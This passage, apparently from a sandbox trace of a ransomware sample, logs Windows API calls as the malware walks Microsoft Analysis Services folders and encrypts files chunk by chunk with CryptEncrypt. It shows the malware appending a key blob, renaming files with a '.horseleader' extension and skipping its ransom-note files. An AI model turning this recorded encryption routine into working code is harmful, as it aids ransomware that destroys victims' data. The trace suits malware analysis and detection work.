nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.182] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.182] CloseHandle (hObject=0x158) returned 1 [0252.182] GetProcessHeap () returned 0x780000 [0252.182] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.182] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll.horseleader") returned 86 [0252.183] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll.horseleader")) returned 1 [0252.184] GetProcessHeap () returned 0x780000 [0252.184] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.184] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb46ad400, ftCreationTime.dwHighDateTime=0x1c8e1fb, ftLastAccessTime.dwLowDateTime=0x516f5b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb46ad400, ftLastWriteTime.dwHighDateTime=0x1c8e1fb, nFileSizeHigh=0x0, nFileSizeLow=0x4dc18, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="msolui100.dll", cAlternateFileName="MSOLUI~1.DLL")) returned 1 [0252.184] lstrcmpiW (lpString1="msolui100.dll", lpString2="Windows") returned -1 [0252.184] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll") returned 74 [0252.184] StrStrIW (lpFirst="msolui100.dll", lpSrch=".horseleader") returned 0x0 [0252.184] lstrcmpW (lpString1="msolui100.dll", lpString2="#Decrypt#.txt") returned 1 [0252.184] lstrcmpW (lpString1="msolui100.dll", lpString2="_uninstalling_.png") returned 1 [0252.185] lstrlenW (lpString=".testttjffg") returned 11 [0252.185] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll", lpSrch=".testttjffg") returned 0x0 [0252.185] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.185] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.185] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolui100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.186] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll") returned 74 [0252.187] StrStrW (lpFirst="msolui100.dll", lpSrch=".txt") returned 0x0 [0252.187] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=318488) returned 1 [0252.187] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.187] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.190] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.191] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.191] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2460c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.191] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.193] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x48c18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.194] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.196] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.196] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.196] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.197] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.197] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.197] CloseHandle (hObject=0x158) returned 1 [0252.197] GetProcessHeap () returned 0x780000 [0252.197] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.197] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll.horseleader") returned 86 [0252.198] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolui100.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolui100.dll.horseleader")) returned 1 [0252.199] GetProcessHeap () returned 0x780000 [0252.199] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.199] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0252.199] lstrcmpiW (lpString1="Resources", lpString2="Windows") returned -1 [0252.199] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources") returned 70 [0252.199] lstrcmpW (lpString1="Resources", lpString2=".") returned 1 [0252.199] lstrcmpW (lpString1="Resources", lpString2="..") returned 1 [0252.199] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.199] GetProcessHeap () returned 0x780000 [0252.199] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.200] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\*") returned 72 [0252.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xaf16b5e4, dwReserved1=0x2f7bdf72, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0252.200] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.200] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\.") returned 72 [0252.200] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.200] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xaf16b5e4, dwReserved1=0x2f7bdf72, cFileName="..", cAlternateFileName="")) returned 1 [0252.201] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.201] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\..") returned 73 [0252.201] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.201] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.201] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xaf16b5e4, dwReserved1=0x2f7bdf72, cFileName="1033", cAlternateFileName="")) returned 1 [0252.201] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0252.201] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033") returned 75 [0252.201] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0252.201] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0252.201] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.201] GetProcessHeap () returned 0x780000 [0252.201] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.201] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\*") returned 77 [0252.201] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6d71033, dwReserved1=0x53fb1b5c, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0252.203] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.203] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\.") returned 77 [0252.203] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.203] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6d71033, dwReserved1=0x53fb1b5c, cFileName="..", cAlternateFileName="")) returned 1 [0252.203] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.203] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\..") returned 78 [0252.203] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.203] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.203] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9f68100, ftCreationTime.dwHighDateTime=0x1c9b09b, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd9f68100, ftLastWriteTime.dwHighDateTime=0x1c9b09b, nFileSizeHigh=0x0, nFileSizeLow=0xa2b58, dwReserved0=0x6d71033, dwReserved1=0x53fb1b5c, cFileName="msmdsrv.rll", cAlternateFileName="")) returned 1 [0252.203] lstrcmpiW (lpString1="msmdsrv.rll", lpString2="Windows") returned -1 [0252.203] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 87 [0252.203] StrStrIW (lpFirst="msmdsrv.rll", lpSrch=".horseleader") returned 0x0 [0252.203] lstrcmpW (lpString1="msmdsrv.rll", lpString2="#Decrypt#.txt") returned 1 [0252.203] lstrcmpW (lpString1="msmdsrv.rll", lpString2="_uninstalling_.png") returned 1 [0252.204] lstrlenW (lpString=".testttjffg") returned 11 [0252.204] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll", lpSrch=".testttjffg") returned 0x0 [0252.204] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0252.204] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0252.204] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0252.205] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 87 [0252.205] StrStrW (lpFirst="msmdsrv.rll", lpSrch=".txt") returned 0x0 [0252.205] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=666456) returned 1 [0252.205] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.205] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0252.252] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.252] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0252.253] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x4edac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.254] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0252.256] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.256] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0252.256] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x9db58, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.256] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0252.259] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.259] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0252.259] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.259] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0252.259] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0252.259] CloseHandle (hObject=0x15c) returned 1 [0252.260] GetProcessHeap () returned 0x780000 [0252.260] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0252.260] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.horseleader") returned 99 [0252.260] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll.horseleader")) returned 1 [0252.261] GetProcessHeap () returned 0x780000 [0252.261] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0252.261] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2512f000, ftCreationTime.dwHighDateTime=0x1c8e1fe, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2512f000, ftLastWriteTime.dwHighDateTime=0x1c8e1fe, nFileSizeHigh=0x0, nFileSizeLow=0x3a18, dwReserved0=0x6d71033, dwReserved1=0x53fb1b5c, cFileName="msolui100.rll", cAlternateFileName="MSOLUI~1.RLL")) returned 1 [0252.261] lstrcmpiW (lpString1="msolui100.rll", lpString2="Windows") returned -1 [0252.261] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 89 [0252.261] StrStrIW (lpFirst="msolui100.rll", lpSrch=".horseleader") returned 0x0 [0252.261] lstrcmpW (lpString1="msolui100.rll", lpString2="#Decrypt#.txt") returned 1 [0252.261] lstrcmpW (lpString1="msolui100.rll", lpString2="_uninstalling_.png") returned 1 [0252.261] lstrlenW (lpString=".testttjffg") returned 11 [0252.261] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll", lpSrch=".testttjffg") returned 0x0 [0252.261] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0252.261] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0252.262] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0252.262] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 89 [0252.262] StrStrW (lpFirst="msolui100.rll", lpSrch=".txt") returned 0x0 [0252.262] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=14872) returned 1 [0252.262] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x3a18, lpOverlapped=0x0) returned 1 [0252.264] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffc5e8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.265] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x3a18, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x3a18, lpOverlapped=0x0) returned 1 [0252.265] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.265] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0252.265] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0252.265] CloseHandle (hObject=0x15c) returned 1 [0252.265] GetProcessHeap () returned 0x780000 [0252.266] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0252.266] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.horseleader") returned 101 [0252.266] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll.horseleader")) returned 1 [0252.267] GetProcessHeap () returned 0x780000 [0252.267] HeapFree (in: hHeap=0x780000, 